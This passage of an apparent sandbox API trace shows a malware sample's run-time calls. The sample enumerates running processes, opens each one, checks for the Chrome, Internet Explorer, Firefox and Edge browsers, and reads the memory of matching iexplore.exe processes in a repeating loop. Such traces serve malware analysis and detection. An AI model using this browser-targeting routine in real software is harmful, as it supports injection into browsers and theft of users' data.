	[0211.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.924] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0211.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.924] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.924] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0211.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.925] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.925] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0211.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3c1c
	[0211.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.926] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0211.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.956] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.957] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0211.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.958] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0211.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3c20
	[0211.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.959] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0211.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.960] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.960] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0211.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.961] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.961] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3c24
	[0211.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.963] NtQueryInformationProcess (in: ProcessHandle=0x3c24, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.963] ReadProcessMemory (in: hProcess=0x3c24, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.963] ReadProcessMemory (in: hProcess=0x3c24, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.963] ReadProcessMemory (in: hProcess=0x3c24, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.963] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.963] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3c28
	[0211.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.964] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.965] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.965] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.966] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.966] NtQueryInformationProcess (in: ProcessHandle=0x3c28, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.966] ReadProcessMemory (in: hProcess=0x3c28, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.966] ReadProcessMemory (in: hProcess=0x3c28, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.966] ReadProcessMemory (in: hProcess=0x3c28, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.966] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3c2c
	[0211.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0211.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3c30
	[0211.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.969] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0211.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.969] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0211.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3c34
	[0211.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.971] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.972] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.972] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.972] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3c38
	[0211.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.974] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.974] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.975] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.975] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0211.976] CloseHandle (hObject=0x188) returned 1
	[0211.977] Sleep (dwMilliseconds=0x64) 
	[0212.084] GetCurrentProcessId () returned 0x110
	[0212.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0212.090] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0212.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0212.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0212.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3c3c
	[0212.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.094] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.094] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.095] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.095] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.095] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3c40
	[0212.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.096] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.096] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.096] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.097] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.097] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0212.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3c44
	[0212.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.098] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0212.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.098] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.099] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0212.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.099] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3c48
	[0212.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.100] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.100] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.101] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.101] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0212.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3c4c
	[0212.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0212.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.103] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0212.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.103] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.103] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0212.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3c50
	[0212.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.104] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0212.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.104] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.105] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0212.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.105] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0212.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3c54
	[0212.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.106] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0212.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.106] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.106] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0212.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.107] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0212.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3c58
	[0212.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.108] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.108] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.108] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.108] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.109] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3c5c
	[0212.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.109] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.110] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.110] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.110] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.110] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3c60
	[0212.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.111] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.112] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.112] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.112] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.112] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3c64
	[0212.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.113] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.114] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.114] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.115] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3c68
	[0212.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.115] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.116] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.116] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.116] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3c6c
	[0212.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.118] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
